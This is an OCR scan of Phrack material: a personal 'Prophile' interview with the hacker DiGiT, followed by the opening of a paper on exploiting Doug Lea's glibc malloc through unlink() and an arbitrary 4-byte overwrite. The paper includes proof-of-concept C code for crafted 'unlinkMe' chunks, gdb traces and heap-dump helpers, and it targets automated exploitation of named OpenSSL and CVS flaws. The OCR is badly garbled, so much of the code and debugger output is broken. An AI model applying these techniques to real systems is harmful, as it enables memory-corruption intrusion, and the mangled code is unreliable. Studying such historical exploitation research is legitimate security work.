| [ PROPHILE ON DL -G Eee | 
| | 
| [ Phrack Staff ] | 
=---=[ Specification 
Handle: DiGiT 
AKA: digit, eskimo, icemonkey 


Handle origin: 


its not a funny story 


catch him: digit@security.is 


Age of your body: 22 
Produced in Reykjavik, Iceland 
Height & Weight: 192cm, 80kg 
Urlz: none 
Computers: 2 laptops, 3 intel machines, indigo II, anda 


sparc station 


Member of: smapika international 


Projects: Mostly just stuff for my work and school related 
things. 
=---=[ Favorite things 
Women: brunettes, blondes, and I prefer they have charisma, 
ambition, independence, intelligence, sense of humor 
Cars: German of course ;> 
Foods: Italian, asian 
Alcohol: beer, vodka/coke 
Music: trance/techno, rock, classical 
Movies: Pianist, godfather, Dune, LOTR, Bad boy bubby, Happiness 
Books & Authors: 
Urls: 
I like: Achiving my goals, honesty, integrity, wachyness 
I dislike: Waking up very early in the morning, constant rain, stuck 
in an office all day, fake people 
=-—--=[ Life in 3 sentences 


No fear. Never give up. Never surrender. 
=---=[ Passions | What makes you tick 
I like to set myself some sort of goal and try to achieve that within 


a certain amount of time. Being able to be my own boss is probably my 
greatest passion. I don’t like to take orders and I value my independence 
greatly and the ability to do whatever I want is pretty important to me. 


ly quit everything to do almost nothing but 
computers/inet/hacking. I did that since I was around 16 until I was 20. I 
audited code around the clock, hacking, wrote exploits, and chatted with my 
friends on irc from dusk till dawn basically. 


In the past I basicall 


The biggest experience for me was probably meeting the people that I 
did and the influence they had on me to improve myself. I probably have 
meeting antilove/RawPower and crazy-b at the top of my list with regards to 
that and they both really influenced me a lot and they probably provided me 


with my greatest experience with regards to hacking. 
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|=---=[ Which research have you done or which one gave you the most fun? 
None much more than any other. Whenever I found some bug or something 


that I knew was unknown and the satisfaction of exploiting it was a lot of 
fun. 


-—-=[ Memorable Experiences 


I will never forget getting run over by a bus when I was 14 and having 
to stay in a hospital for 3 months and the frequent trips for another year 
afterwards pretty much is something I will never forget. Also the fact that 
the longest strike of Icelandic highschool teachers in icelandic history 
was happening at the exact same time I was stuck in a bed in a hospital. 


Installing my first Linux system(back in '’94 i think) and thinking that 
the installation floppy shell prompt from the slackware distro was 
basically a full installation of slackware ;> I had hardly any previous 
experience with Linux at the time. 


Spending an absurd amount of time at my computer doing crazy stuff for 
no other reason other than to get the get the best rush imaginable. 


Meeting crazy-b for the first time on the same system we were both 
hacking and then deciding to meet on irc and becoming friends in the 
process. 


When crazy-b had to go into the norwegian army he wrote a small program 
that was a rudimentary irc client that piped input from an irc channel to a 
script that sent an sms to his phone with the input and also him being able 
to send an email to his address that piped the content of the mail to the 
irc channel. This way he could still irc from his mobile phone despit 

being in the army ;> 


Meeting the great antilove back in ’97 and getting some private samba 
warez ;> 


Having antilove visit Iceland twice and doing lots of cool stuff with 
him like rollerblading, hunting for smapika, acting stupid, him teaching me 
how to lockpick, finding new bugs, writing exploits, teaching me how to 
bluebox, etc. 


Totally destroying my car when me and antilove were driving to a kfc in 
2001 because some girl ran a red light at about 80km/h in the morning and 
then laughing about it the entire day for some reason. 


All the security.is weekends with the exploits we wrote and the bugs 
that we found together and with the trademark security.is hamburgers as 
made by portal. 


Having lots of fun with mikasoft and ga when they visited Iceland for 
new years a few years ago and especially when mikasoft was teaching yoga at 
a new years eve dinner my family was throwing. Also the duck liver pat was 
disgusting. 


Going to France with Icelandic friends and meeting a lot of hackers in 
Paris and having like 10 guys sleeping in the smallest room you could 
imagine. Then taking a cool train trip from Paris to montpellier and 
meeting a lot of other hackers and just totally invading montpellier and 
taking over an internet cafe for a week ;> Also hanging out at the beech 
with the amazingly cool french guys and starting a fire and drinking beer 
and listening to good music. 


Going to the club La Dune on our FIRST night in montpellier with all 
the french hackers/etc and buying a lot of champagne for everyone and 
antilove and nitro buying a ton of vodka for a group of like 20 people and 
just partying the entire night and watching all the non french people mak 
total asses of themselves. 
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Same night at La dune I will never forget witnessing Candypimp going 
beserk after drinking way too much and trying to jump into the ocean and 
then disapeering. we called the police to search for an /’insane’ drunk 
Icelandic person that couldn’t speak english anymore and who thought he was 
in his home city of Akureyri and not 50km away from montpellier and 
probably even didn’t know where we were staying! 


JimJones was really drunk that night too and he passed out on some tree 
before waking up again and deciding to take a piss. He went into some ditch 
and somehow he managed to piss all over himself! If I remember correctly 
me, nitro, and antilove had to remove his clothes that night because he was 
too drunk to do it himself. He was then called pissman for the duration of 
the trip ;> 


Going to Las vegas with Starcon for blackhat and defcon and actually 
PAYING for blackhat but I only went to 1 speech(halvars) because my brother 
took the time to come down from Seattle to visit me. 


Going to defcon and seeing how amazingly commercial and fake it really 
is. Just look at the shit being sold there and all those stupid t-shirt 
stands. 


The coolest thing about defcon was the K2 party where a lot of people 
were hanging out and it was a very memorable night and I had nice talks 
with a lot of cool people. 


A recent jimjones visit to Iceland where we really didn’t do anything 
except relax and drink beer and eat some BBO. We also enjoyed a very nice 
viewing of bad boy bubby which I recommend to anyone that wants a good 
laugh and some insight into the world of jimjones(based on his lifes story). 


| =[ Open Interview 
[can give as much detailed answers here as you like] 


Q: When did you start to play with computers? 
A: I was probably around 12 years old when I got my first real computer. 


Q: When did you had your first contact to the ’scene’? 

A: Boy... I guess it is probably sometime in 1995 and I got involved with 
some "hackers" doing some questionable things ;> I think I started off 
by joining #hack on IRCnet and also #shells on efnet(ehrm! ;>) 


Q: When did you for your first time connect to the internet? 

A: Was at my school when I was probably around 13 years old and we had a 
2400 baud modem and some old dial up program called kermit, i think, 
that we used to call some line at the Icelandic university. It was 
basically just a direct connection to a hp-ux box and someone tought me 
how to use ircii and so basically my first experience with the Internet 
was also my first time with irc. 


Q: What other hobbies do you have? 
A: I like to do stuff with my friends,go see movies, fish, read, go out for 
drinks, and just anything that comes up. 


Q: ...and how long did it take until you joined irc? Do you remember 
the first channel you joined? 

A: Again this was not very far between since I started irc pretty much the 
same time. I believe the first channel I joined was #iceland. 


Q: What’s your architecture / OS of choice? 
A: Im so used to intel so I really can’t pick anything else and Linux is 
still my preferred OS although i have netbsd here somewher 


Q: What do you think about anti.security.is and non-disclosure? 
A: anti security was a good idea but ultimately it was a failure. The 
reason it failed was that the people that supported none-disclosure and 
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took part in antisec discussions were constantly arguing amongst 
themselves about a lot of stuff some of which was for good reasons but 
also stuff that was totally out there and eventually it lead to antisec 
dying. 


I personally believe that none-disclosure is the way to go and I have 
believed that for some time now. I don’t judge people that disclose 
because I remember disclosing bugs/exploits at one point and so I am not 
really in a position to flame people that continue to do so. 


I mean antisec also had some stupid information in some areas 
specifcally about the true reasons behind antisec were not to create 
some greater security in the world or something like that which was 
mentioned in the FAQ and we took a lot of crap for. It was to keep 
security research where it belongs, with those that actually did it and 
at most a small tight knit group. That basically meant that people that 
found bugs, wrote exploits, and hacked wanted to keep their 
exploits/research private so that they had some nice private warez for 
some time ;> 


Full disclosure is for equally selfish reasons because it really boils 
down to two things: fame and money. People think, rightly so, that by 
releasing bugs or exploits that they become recognized among their peers 
and that might eventually lead to a job in security or something like 
that. People that say they release bugs/exploits for the good of the 
world or something like that are full of shit. 


Q: What do you think about the right of other ’research’ groups to forbid 
other organizations the use of their exploits ("Copyright on exploits")? 

A: Seriously who would care about a copyright header on some exploit? 
People would use it anyways. 


Q: What do you thing about full-disclosure. Is it important or dangerous? 
A: I know I don’t like it and there are a lot of good reasons why it sucks. 
It ruins bugs! ;> And there are some negative "world issues" because 
every hacker that wants to make a name for himself will try to write an 

exploit for it and subsequently release it. Maybe he doesn’t release 
directly to BUGTRAQ but he gives it to lots of "friends" which leak it 
of course and soon enough its everywhere. 


What happens next is that every script kiddie and some more advanced 
script kiddies will use the exploit and deface sites, ruin stuff, and 
then soon a worm will appear. I do not personally have anything against 
those things per se but I’m sure a lot of people do. If the 
vulnerability is unknown or kept private such things would not happen. 


Full disclosure can definetly be really dangerous and we all know that 
the people that discover bugs in software aren’t on some quest to secure 
software for the good of the world. They do it for themselves. Also why 
should hackers do the job for software companies and even if they 
publish they risk getting sued or something? I also hate all those full 
disclosure policies that say you need to give a vendor a month or 
something before publishing and all the other stupid rules. 

My advice: don’t disclose - avoid the hassle. 


I do however agree to some of the arguments about the necessity of full 
disclosure. I can’t remember any right now so forget that but ultimately 
full disclosure of any vulnerability is the fuel the drives th 
information security companies that don’t care about anything except 
their bottom line. 


Q: If you see or hear about various protection meassures against hackers 
such as grsecurity, PaX, Owl or strong encryption (SSH, SSL or IPSec) 
do you think hacking will still be possible in the future? What kind of 
vulnerabilities will people focus on in the future? 

A: If we assume that all these programs are successful in stopping most 
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buffer overflow attacks and it has become ’impossible’ to evade thes 
programs then just new types of vulnerabilities will be discovered. 
Logic bugs in programs are just as dangerous as buffer overflows and so 
hacking will of course be possible in the future the only thing that 
will change are the vulnerabilities and the methods. 


Q: How do you feel when yet another XSS vulnerability hits the media? 
(Do you have a regex covering XSS postings in your spam filter?) 
A: blah 


Q: What will hacking in the future look like? More complicated or easier? 
A: no idea. 


Q: You have been in the scene for quite a while. If you look back, what 
was the worst thing that happened to the scene? What was the best 
that happened? 

A: This "scene" always comes up. I never followed any specific scene or 
anything. I was just chatting with my friends and hacking with them and 
that was about it. Although I guess the commericialization of everything 
in the scene was probably the worst thing that happened. Didn’t bugtraq 
get sold for millions of dollars? A mailing list! And companies buying 
exploits how low can u get? 


Q: If you could turn the clock backwards, what would you do different 
in your young life ? 
A: My young life? Portal calls me grandpa. I guess I would go back a few 
years into the past and avoid losing contact with my old friends. 
=---=[ One word comments 


[give a 1l-word comment to each of the words on the left] 


Digital Millennium Copyright Act (DMCA): blabla 


security.is : sleeping 
Georges. W. BUSH : war 
Companies buying exploits from hackers : silly 
IRC : burp 
Hacker meetings : colorful 
Full Disclosure Policy : pseudo 
anti.security.is : dead 
Whitehats : dingdong 


|=---=[ Any suggestions/comments/flames to the scene and/or specific people? 


Do what you want to do and don’t let anyone control you. 


|=---=[ The future of the computer underground 


What is the computer underground anyways? People talk about it as if it 
were some very formal and controlled thing or something. The computer 
underground as I understand it basically just consists of various groups 
and places people hang out at and talk and do stuff together in small 
seperate groups. I have no idea where it is gona go in the future. 


=---=[ Shoutouts & Greetings 


I wana send a big hello to: 


security.is, antilove(miss u bro), crazy-b(beware of hermaphrodites), 
cleb(rest in peace man), old ADM pals, JimJones, old #hax guys! stealth, 
sk8 (freesk8.org), mikasoft, ga, ace24, ig-88, ghettodxm, scut, horizon, 
duke, cheez, starcon, lkm, nitro, bawd, wtf, kewl, joey, 
Synner/m0nty/Kod/Jackal (crazy greeks) and everyone of my other old friends 
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that I haven’t talked to in years. 


|=[ EOF ] 
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--[ 1. Abstract 


This paper details several techniques that allow more generic and reliable 
exploitation of processes that provide us with the ability to overwrite 

an almost arbitrary 4 byte value at any location. 

Higher level techniques will be constructed on top of the unlink() basic 
technique (presented in MaXX’s article [2]) to exploit processes which 
allow an attacker to corrupt Doug Lea’s malloc (Linux default’s dynamic 
memory allocator). 

unlink() is used to force specific information leaks of the target process 
memory layout. The obtained information is used to exploit the target 
without any prior knowledge or hardcoded values, even when randomization 
of main object’s and/or libraries’ load address is present. 


Several tricks will be presented along different scenarios, including: 
special chunks crafting (cushion chunk and unlinkMe chunk) 
heap layout consciousness and analysis using debugging tools 
automatically finding the injected shellcode in the process memory 
forcing a remote process to provide malloc’s internal structures 
addresses 
* looking for a function pointer within glibc 
* injecting the shellcode into a known memory address 


+ 


* 


* 


The combination of these techniques allows to exploit the OpenSSL ’SSLv2 
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Malformed Client Key Buffer Overflow’ [6] and the CVS ’Directory double 
free’ [7] vulnerabilities in a fully automated way (without hardcoding 
any target based address or offset), for example. 


--[ 2. Introduction 


Given a vulnerability which allows us to corrupt malloc’s internal 
structures (i.e. heap overflow, double free(), etc), we can say it 
‘provides’ us with the ability to perform at least an ’almost arbitrary 4 
bytes mirrored overwrite’ primitive (aa4bmo from now on). 

We say it’s a /mirrored’ overwrite as the location we are writing at 

minus 8 will be stored in the address given by the value we are writing 
plus 12. Note we say almost arbitrary as we can only write values that are 
writable, as a side effect of the mirrored copy. 

The ’primitive’ concept was previously introduced in the ’Advances in 
format string exploitation’ paper [4] and in the ’About exploits writing’ 
presentation [5]. 

Previous work ’Vudo - An object superstitiously believed to embody magical 
power’ by Michel ’/MaXX’ Kaempf [2] and ’Once upon a free()’ [3] give fully 
detailed explanations on how to obtain the aa4bmo primitive from a 
vulnerability. At [8] and [9] can be found the first examples of malloc 
based exploitation. 
We’1l be using the unlink() technique from [2] as the basic lower level 
mechanism to obtain the aa4bmo primitive, which we’ll use through all the 
paper to build higher level techniques. 


malloc higher 
vulnerability -> structures -> primitive -> level 

corruption techniques 
heap overflow unlink () freeing the output 
double free() > technique -> aa4bmo -> hitting the output 


cushion chunk 


This paper focuses mainly on the question that arises after we reach the 
aa4bmo primitive: what should we do once we know a process allows us to 
overwrite four bytes of its memory with almost any arbitrary data? 

In addition, tips to reach the aa4bmo primitive in a reliable way are 
explained. 


Although the techniques are presented in the context of malloc based 
heap overflow exploitation, they can be employed to aid in format string 
exploits as well, for example, or any other vulnerability or combination 
of them, which provide us with similar capabilities. 


The research was focused on the Linux/Intel platform; glibc-2.2.4, 
glibc-2.2.5 and glibc-2.3 sources were used, mainly the file malloc.c 

(an updated version of malloc can be found at [1]). Along this paper we’1ll 
use ‘malloc’ to refer to Doug Lea’s malloc based implementation. 


--] 3. Automating exploitation problems 


When trying to answer the question ’what should we do once we know we can 
overwrite four bytes of the process memory with almost any arbitrary 
data?’, we face several problems: 


A] how can we be sure we are overwriting the desired bytes with the 
desired bytes? 

As the aa4bmo primitive is the underlying layer that allows us to 
implement the higher level techniques, we need to be completely sure it is 
working as expected, even when we know we won’t know where our data will 
be located. Also, in order to be useful, the primitive should not crash 
the exploited process. 
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B] what should we write? 

We may write the address of the code we intend to execute, or we may 
modify a process variable. In case we inject our shellcode in the 
process, we need to know its location, which may vary together with the 
evolving process heap/stack layout. 


C] where should we write? 

Several known locations can be overwritten to modify the execution flow, 
including for example the ones shown in [10], [11], [12] and [14]. 

In case we are overwriting a function pointer (as when overwriting a stack 
frame, GOT entry, process specific function pointer, setjmp/longyjmp, 

file descriptor function pointer, etc), we need to know its precise location. 
The same happens if we plan to overwrite a process variable. For example, 
a GOT entry address may be different even when the source code is the 
same, as compilation and linking parameters may yield a different process 
layout, as happens with the same program source code compiled for 
different Linux distributions. 


Along this paper, our examples will be oriented at overwriting a function 
pointer with the address of injected shellcode. However, some techniques 
also apply to other cases. 


Typical exploits are target based, hardcoding at least one of the values 
required for exploitation, such as the address of a given GOT entry, 
depending on the targeted daemon version and the Linux distribution and 
release version. Although this simplifies the exploitation process, it is 
not always feasible to obtain the required information (i.e. a server can 
be configured to lie or to not disclose its version number). Besides, w 
may not have the needed information for the target. Bruteforcing more than 
one exploit parameter may not always be possible, if each of the values 
can’t be obtained separately. 
There are some well known techniques used to improve the reliability 
(probability of success) of a given exploit, but they are only an aid for 
improving the exploitation chances. For example, we may pad the shellcode 
with more nops, we may also inject a larger quantity of shellcode in the 
process (depending on the process being exploited) inferring there are 
more possibilities of hitting it that way. Although thes nhancements 
will improve the reliability of our exploit, they are not enough for an 
exploit to work always on any vulnerable target. In order to create a 
fully reliable exploit, we’ll need to obtain both the address where our 
shellcode gets injected and the address of any function pointer to 
overwrite. 


In the following, we discuss how these requirements may be accomplished in 
an automated way, without any prior knowledge of the target server. Most 
of the article details how we can force a remote process to leak the 
required information using aa4bmo primitive. 


--] 4. The techniques 

--] 4.1 aa4bmo primitive 

—-] 4.1.1 First unlinkMe chunk 

In order to be sure that our primitive is working as expected, even in 


scenarios where we are not able to fully predict the location of our 
injected fake chunk, we build the following ’unlinkMe chunk’: 


-4 -4 what where-8 -1l1 -15 -19 

| | | | | | | | 

sizeB sizeA FD BK 

eS Sao nasty chunk | | > 
(X) 


We just need a free() call to hit our block after the (X) point to 
overwrite ’where’ with ’what’. 
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When free() is called the following sequence takes place: 


—- chunk_free() tries to look for the next chunk, it takes the chunk’s 
size (<0) and adds it to the chunk address, obtaining always the sizeA 
of the /nasty chunk’ as the start of the next chunk, as all the sizes 
after the (X) are relative to it. 


—- Then, it checks the prev_inuse bit of our chunk, but as we set it (each 
of the sizes after the (X) point has the prev_inuse bit set, the 
IS_MMAPPED bit is not set) it does not try to backward consolidate 
(because the previous chunk ’seems’ to be allocated). 


— Finally, it checks if the fake next chunk (our nasty chunk) is free. It 
takes its size (-4) to look for the next chunk, obtaining our fake 
sizeB, and checks for the prev_inuse flag, which is not set. So, it 
tries to unlink our nasty chunk from its bin to coalesce it with the 
chunk being freed. 


—- When unlink() is called, we get the aa4bmo primitive. The unlink() 
technique is described in [2] and [3]. 


--] 4.1.1.1 Proof of concept 1: unlinkMe chunk 


We’1l use the following code to show in a simple way the unlinkMe chunk in 
action: 


define WHAT_2 WRITE Oxbfffff00 


define WHERE 2 WRITE Oxbfffff00 
define SZ 256 
define SOMEOFFSET 5 + (rand() % (SZ-1)) 
define PREV_INUSE 1 
define IS _MMAP 2 
int main(void) 
unsigned long *unlinkMe=(unsigned long*)malloc(SZ*sizeof (unsigned long)); 
int i = 0; 
unlinkMe [i++] 4; 
unlinkMe [i++] 4; 
unlinkMe [i ] WHAT _2 WRITE; 
unlinkMe [i i WHERE_2_ WRITE-8; 
for(;i<SZ;it+t) { 
unlinkMe[i] = ((-(i-1) * 4) & ~IS_MMAP) | PREV_INUSE ; 


free (unlinkMe+SOMEOFFSBET) ; 
return 0; 


} 


Breakpoint 3, free (mem=0x804987c) at heapy.c:3176 


if (mem == 0) /* free(0) has no effect */ 
3181 Pp = mem2chunk (mem) ; 
3185 if (chunk_is_mmapped (p) ) /* release mmapped memory. */ 


We did not set the IS_MMAPPED bit. 


3193 ar_ptr = arena_for_ptr(p); 
3203 (void) mutex_lock (éar_ptr->mutex) ; 
3205 chunk_free(ar_ptr, p); 


After some checks, we reach chunk_free(). 


(gdb) s 
chunk_free (ar_ptr=0x40018040, p=0x8049874) at heapy.c:3221 


Let’s see how does our chunk looks at a random location... 


(gdb) x/20x p 
0x8049874: Oxfffffd71 Oxfffffded Oxfffffde9 Oxfffffde5 
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0x8049884: Oxfffffdel Oxfffffd5d 
0x8049894: Oxfffffd5l1 Oxfffffd4d 
0x80498a4: Oxfffffd41 Oxfffffd3d 
Ox80498b4: Oxfffffd31 Oxfffffd2d 
We dumped the chunk including its header, 
3221 INTERNAL_SIZE_T hd = 

3235 sz = hd & ~PREV_INUSE; 

(gdb) p/x hd 

$5 = Oxfffffded 

(gdb) p/x sz 

S6 = Oxfffffd6c 

3236 next = chunk_at_offset(p, sz); 
3237 nextsz = chunksize (next); 

Using the negative relative size, chunk_fr 
see which is the ‘’next’ chunk: 

(gdb) x/20x next 

0x80495e0: Oxfffffffc Oxfffffffc 
Ox80495f0: Oxfffffff5 Oxfffffff1 
0x8049600: Oxffffffed Oxffffffel 
Ox8049610: Oxffffffd5 Oxffffffdl 
0x8049620: Oxffffffc5 Oxffffffcl 
(gdb) p/x nextsz 

$7 = Oxfffffffc 

It’s our nasty chunk... 

3239 if (next == top(ar_ptr) ) 

3278 islr = 0; 

3280 if (! (hd & PREV_INUSE) ) 


We avoid the backward consolidation, 


3294 


But we force a forward consolidation. 
(4) 


nextsz 


if 
/* consoli 


to our nasty c 


in our other -4 size. 


(! (inuse_bit_ 


at_offset (next, 
date forward */ 


The 
hunk’s address, 


bck, fwd); 


is called with our supplied values: 
(it does not crash, 


at_offset (p, 
PREV_INUSE) ; 


3296 sz += nextsz; 
3298 if 
3306 unlink (next, 
unlink () 
forward and backward pointers 
addresses). 

next = chunk_ 
3315 set_head(p, sz | 
3316 next—>prev_siz 
3307 if (!islr) { 
3318 frontlink(ar_p 
fronlink() is call 
—--- BIN DUMP --- 


arena @ 0x40018040 - top @ 0x8049a40 - top size 


bin 126 @ 0x40018430 


free_chunk @ 0x80498d8 


= SZ; 


tr, Pp, sz, idx, 


SZ); 


Oxfffffd59 
Oxfffffd49 
Oxfffffd39 
Oxfffffd29 


Oxfffffd55 
Oxfffffd45 
Oxfffffd35 
Oxfffffd25 


as received by chunk_free(). 


p->size; /* its head field */ 


() gets the next chunk, let’s 
OxbfffFff£00 Oxbffffefs8 
Oxffffffed Oxffffffe9 
Oxffffffdd Oxffffffd9 
Oxffffffcd Oxffffffc9 
Oxffffffbd Oxffffffb9 


as we set the PREV_INUS 


/* merge with top */ 


nextsz))) 


inuse_bit_at_offset () 
and looks for the PREV_INUSE 


’ 


beck, 


- size Oxfffffde4 


(!iaslr && next->fd == last_remainder (ar_ptr) ) 


fwd); 


0x05c0 


/* consolidate backward */ 


im 
ry 


bit. 


macro adds 
bit 


Oxbffffef8 and Oxbfffff00 as 
as they are valid 


ed and our chunk is inserted in the proper bin. 
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The chunk was inserted into one of the bigger bins... as a consequence of 
its ’negative’ siz 

The process won’t crash if we are able to maintain this state. If more 
calls to free() hit our chunk, it won’t crash. But it will crash in case a 
malloc() call does not find any free chunk to satisfy the allocation 
requirement and tries to split one of the bins in the bin number 126, as 
it will try to calculate where is the chunk after the fake one, getting 
out of the valid address range because of the big ’negative’ size (this 
may not happen in a scenario where there is enough memory allocated 
between the fake chunk and the top chunk, forcing this layout is not very 
difficult when the target server does not impose tight limits to our 
requests size). 


We can check the results of the aa4bmo primitive: 


(gdb) x/20x Oxbfffff00 


OxbfffffO0: Oxbfffff00 0x414c0065 0x653d474e Oxbffffef8 
Oxbfffff10: Ox6£73692e 0x39353838 0x53003531 0x415£4853 
Oxbfffff20: 0x41504b53 Ox2£3d5353 Ox2£727375 0x6562696c 
Oxbfffff30: Ox2£636578 Ox6e65706F£ Ox2£687373 Ox6d6f6e67 
Oxbfffff40: 0x73732d65 0x73612d68 0x7361706b 0x4f480073 
If we add some bogus calls to free() in the following way: 

for (i=0;1<5;it+t+) fr (unlinkMe+SOMEOFFSET) ; 


we obtain the following result for example: 


—--— BIN DUMP --- 
arena @ 0x40018040 - top @ 0x8049acO - top size = 0x0540 
bin 126 @ 0x40018430 

free_chunk 0x8049958 - size 0x8049958 
free_chunk 0x8049954 - size Oxfffffd68 
free_chunk 0x8049928 —- size Oxfffffd94 
free_chunk 0x8049820 - size 0x40018430 
free_chunk 0x80499c4 - size Oxfffffcf8 
free_chunk 0x8049818 - size Oxfffffea4 


Qa QO OQ @ @ @® 


without crashing the process. 


--] 4.1.2 New unlinkMe chunk 


Changes introduced in newer libc versions (glibc-2.3 for example) affect 
our unlinkMe chunk. The main problem for us is related to the addition of 


oD 


one flag bit more. SIZE_BITS definition was modified, from: 


#define SIZE_BITS (PREV_INUSE|IS_MMAPPED) 


to: 


define SIZE_BITS (PREV_INUSE|IS_MMAPPED | NON_MAIN_ARENA) 


The new flag, NON_MAIN_ARENA is defined like this: 


/* size field is or’ed with NON_MAIN_ARENA if the chunk was obtained 
from a non-main arena. This is only set immediately before handing 
the chunk to the user, if necessary. * / 

#define NON_MAIN_ARENA 0x4 


This makes our previous unlinkMe chunk to fail in two different points in 
systems using a newer libc. 


Our first problem is located within the following code: 
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public_fREe (Void_t* mem) 
{ 


ar_ptr = arena_for_chunk (p); 


_int_free(ar_ptr, mem); 


where: 


#define arena_for_chunk(ptr) \ 
(chunk_non_main_arena(ptr) ? heap_for_ptr(ptr)->ar_ptr : &main_arena) 


and 


/* check for chunk from non-main arena */ 
#define chunk_non_main_arena(p) ((p)->size & NON_MAIN_ARENA) 


If heap_for_ptr() is called when processing our fake chunk, the process 
crashes in the following way: 


0x42074a04 in free () from /lib/i686/libc.so.6 
1: x/i Seip 0x42074a04 <freet+84>: and S0x4, %edx 

(gdb) x/20x Sedx 
Oxffffffdd: Cannot access memory at address Oxffffffdd 
0x42074a07 in free () from /lib/i686/libc.so.6 

: x/i Seip 0x42074a07 <freet+87>: je 0x42074a52 <free+162> 
0x42074a09 in free () from /lib/i686/libc.so.6 

: x/i Seip 0x42074a09 <freet+89>: and SOxff£f£00000, teax 
0x42074a0e in free () from /lib/i686/libc.so.6 

x/i Seip 0x42074a0e <freet+94>: mov (eax), %ed1 

(gdb) x/x Seax 
O0x8000000: Cannot access memory at address 0x8000000 


Program received signal SIGSEGV, Segmentation fault. 
0x42074a0e in free () from /lib/i686/libc.so.6 
1: x/i Seip 0x42074a0e <freet94>: mov (Seax) , sedi 


So, the fake chunk size has to have its NON_MAIN_ARENA flag not set. 


Then, our second problem takes places when the supplied size is masked 
with the SIZE_BITS. Older code looked like this: 


nextsz = chunksize(next); 
0x400152e2 <chunk_freet+64>: mov 0x4 (Sedx) , Secx 
0x400152e5 <chunk_freet+67>: and SOxfffffffc, tecx 


and new code is: 


nextsize = chunksize(nextchunk) ; 
0x42073fe0 <_int_free+112>: mov 0x4 (Secx) , eax 
0x42073fe3 <_int_freet115>: mov secx, Oxffffffec (Sebp) 
0x42073fe6 <_int_freet118>: mov seax, Oxffffffe4 (Sebp) 
0x42073fe9 <_int_freet+121>: and SOxfffffff8, teax 


So, we can’t use -4 anymore, the smaller size we can provide is -8. 
Also, we are not able anymore to make every chunk to point to our nasty 
chunk. The following code shows our new unlinkMe chunk which solves both 
problems: 


unsigned long *aa4bmoPrimitive (unsigned long what, 
unsigned long where,unsigned long sz) { 


unsigned long *unlinkMe; 
int i=0; 
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if(sz<13) sz = 13; 
unlinkMe=(unsigned long*)malloc(sz*sizeof (unsigned long) ); 

// 1st nasty chunk 
unlinkMe [i 4; // PREV_INUSE is not set 
unlinkMe [i 4; 
unlinkMe [i 4; 
unlinkMe [i what; 
unlinkMe [i where-8; 

// 2nd nasty chunk 
unlinkMe [i 4; // PREV_INUSE is not set 
unlinkMe [i 4; 
unlinkMe [i 4; 
unlinkMe [i what; 
unlinkMe [i where-8; 

for (;i<sz;itt) 

if (1%2) 
// velative negative offset to lst nasty chunk 
unlinkMe[i] = ((-(i-8) * 4) & ~(IS_MMAP |NON_MAIN_ARENA)) | PREV_INUSE; 
else 
// velative negative offset to 2nd nasty chunk 
unlinkMe[i] = ((-(i-3) * 4) & ~(IS_MMAP |NON_MAIN_ARENA)) | PREV_INUSE; 


free (unlinkMe+SOMEOFFSET ( 
return unlinkMe; 


} 


SZ)); 


The process is similar to the previously explained for the first unlinkMe 
chunk version. Now, we are using two nasty chunks, in order to be able to 


point every chunk to one of 
set) before each of the nast 
"4.1.1 First unlinkMe chunk’ 
provide. 


them. Also, we added a —-4 (PREV_INUSE flag not 
y chunks, which is accessed in step 3 of the 
section, as -8 is the smaller size we can 


This new version of the unlinkMe chunk works both in older and newer libc 


versions. Along the article 


most proof of concept code uses the first 


version, replacing the aa4bmoPrimitive() function is enough to obtain an 


updated version. 


--] 4.2 Heap layout analysis 


You may want to read the ’Appendix I - malloc internal structures 


overview’ section before goi 
Analysing the targeted proce 


ng on. 
ss heap layout and its evolution allows to 


understand what is happening in the process heap in every moment, its 


state, evolution, changes... 


etc. This allows to predict the allocator 


behavior and its reaction to each of our inputs. 


Being able to predict the he 


ap layout evolution, and using it to our 


advantage is extremely important in order to obtain a reliable 


exploit. 
To achieve this, we’ll need 


to understand the allocation behavior of 


the process (i.e. if the process allocates large structures for each 


connection, if lots of free 

specific command handler, et 
force a big/small allocation 
We must pay attention to eve 
how/where we might be able t 
that a reliable situation is 
For example, in a double fre 
second free() call (trying t 
probably crash the process. 


chunks/heap holes are generated by a 
c), which of our inputs may be used to 
, etc. 

ry use of the malloc routines, and 

o influence them via our input so 
reached. 

e() vulnerability scenario, we know the 
o free already freed memory), will 


Depending on the heap layout evolution 


between the first free() and the second free(), the portion of memory 


being freed twice may: have 


not changed, have been reallocated several 


times, have been coalesced with other chunks or have been overwritten and 


freed. 


The main factors we have to 


recognize include: 
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A] chunk size: does the process allocate big memory chunks? is our 
input stored in the heap? what commands are stored in the heap? 
is there any size limit to our input? am I able to force a heap 
top (top_chunk) extension? 

B] allocation behavior: are chunks allocated for each of our 


connections? what size? are chunks allocated periodically? are 


chunks freed periodically? (i.e. async garbage collector, cache 


pruning, output buffers, etc) 


C] heap holes: does the process leave holes? when? where? what size? 


can we fill the hole with our input? can we force the overflow 
condition in this hole? what is located after the hole? are w 


able to force the creation of holes? 

D] original heap layout: is the heap layout predictable after process 
initialization? after accepting a client connection? (this is 
related to the server mode) 


During our tests, we use an adapted version of a real malloc 
implementation taken from the glibc, which was modified to generate 
debugging output for each step of the allocator’s algorithms, plus three 
helper functions added to dump the heap layout and state. 

This allows us to understand what is going on during exploitation, the 
actual state of the allocator internal structures, how our input affects 


them, the heap layout 


, etc. 


Here is the code of the functions we’ll use to dump the heap state: 


static void 
IMFY 2 GED 


else 


endif 


mchunkptr p; 


heap_dump (arena *ar_ptr) 


heap_dump(ar_ptr) arena *ar_ptr; 


fprintf(stderr, "\n--- HEAP DUMP --~-\n"); 


fprintf(stderr, 


W 


ADDRESS SIZE FD BK\n"); 


fo) 


fprintf(stderr,"sbrk_base %p\n", 


(mchunkptr) (((unsigned long) sbrk_base + MALLOC_ALIGN_MASK) & 
“MALLOC_ALIGN_MASK) ); 
p = (mchunkptr) (((unsigned long) sbrk_base + MALLOC_ALIGN_MASK) & 
“MALLOC_ALIGN_MASK) ; 


Eor¢; 7) 


fprintf(stderr, "chunk Sp 0x%.4x", p, (long)p->size); 


if(p == top(ar_ptr)) { 


fprintf(stderr, 
break; 


" (T)\n"); 


} lse if (p->siz 


== (0|PREV_INUS! 


GI 
~~ 
~~ 
a 


fprintf(stderr, " (Z)\n"); 
break; 
} 
if (inuse(p)) 
fprintf(stderr," (A)"); 
else 
fprintf(stderr," (F) | Ox%S8x | Ox%8x |",p->fd,p->bk); 
if ((p->fd==-last_remainder (ar_ptr) ) && (p->bk==last_remainder (ar_ptr) )) 
fprintf(stderr," (LR)"); 
lse if (p->fd==p->bk & ~inuse(p) ) 
fprintf(stderr," (LC)"); 


fprintf(stderr,"\n"); 
